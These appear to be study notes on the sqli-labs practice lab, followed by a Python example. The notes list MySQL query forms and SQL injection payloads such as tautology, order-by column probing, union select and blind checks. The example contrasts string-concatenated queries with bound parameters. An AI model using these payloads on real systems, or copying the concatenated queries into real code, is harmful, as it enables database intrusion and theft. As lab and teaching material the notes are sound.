sqli-labs 1: the database is MySQL
SQL query statement:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
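At index.php?id=, construct possible SQL statements and use the response to judge whether SQL injection exists.
Comments in SQL statements: -- (note that a trailing space is required: use %20, or write + after it)
1. /index.php?id=2%27%20or%201=1%20--+ (injection exists)
2. sqli-labs-master/Less-1/?id=1' order by 3 --+ (3 columns)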
======================================
Query statements in sqli-labs
1. "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
2. "SELECT * FROM users WHERE id=$id LIMIT 0,1";
3. "SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
Method: s-master/Less-3/?id=-2') union select 1,2,3 --+
SELECT * FROM users WHERE id=($id) LIMIT 0,1
Triggers an error: li-labs-master/Less-4/index.php?id=1"
Method: id=0") union select 1,2,3--+
SELECT * FROM users WHERE id='$id' LIMIT 0,1
Blind injection: (no error is reported)
Triggers an error: labs-master/Less-5/index.php?id=1'
Method: p?id=-1' and (select count(*) from users where id=1) >0 --+
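
Added example (not from the original notes or from sqli-labs): the quoted and parenthesised-quoted query forms listed above, built by string concatenation, next to the same lookup with a bound parameter, fed the URL-decoded inputs from these notes. Assumptions: SQLite stands in for the lab's MySQL, and the table rows, function names and dictionary names are constructed for illustration.

```python
import sqlite3

# Constructed sample data; SQLite stands in for the lab's MySQL (assumption).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "pw-a"), (2, "bob", "pw-b"), (3, "carol", "pw-c")])
    return conn

# Two of the wrappings listed in the notes, rebuilt by string concatenation.
TEMPLATES = {
    "quoted": "SELECT * FROM users WHERE id='{id}' LIMIT 0,1",
    "paren_quoted": "SELECT * FROM users WHERE id=('{id}') LIMIT 0,1",
}

def lookup_concat(conn, style, raw_id):
    """Vulnerable form: raw_id becomes part of the SQL text."""
    return conn.execute(TEMPLATES[style].format(id=raw_id)).fetchall()

def lookup_param(conn, raw_id):
    """Hardened form: raw_id is bound as data and never parsed as SQL."""
    return conn.execute("SELECT * FROM users WHERE id = ? LIMIT 0,1", (raw_id,)).fetchall()

# URL-decoded inputs taken from the notes above.
PAGE_INPUTS = {
    "quoted": "2' or 1=1 -- ",
    "paren_quoted": "-2') union select 1,2,3 -- ",
}

def compare(conn):
    """Return {style: (rows via concatenation, rows via bound parameter)}."""
    return {style: (lookup_concat(conn, style, value), lookup_param(conn, value))
            for style, value in PAGE_INPUTS.items()}

if __name__ == "__main__":
    for style, (concat_rows, param_rows) in compare(make_db()).items():
        print(style, "concat:", concat_rows, "param:", param_rows)
```

With concatenation the comment marker removes the trailing LIMIT 0,1 and the input rewrites the WHERE clause; with the bound parameter the same input is compared as a literal value and matches no row.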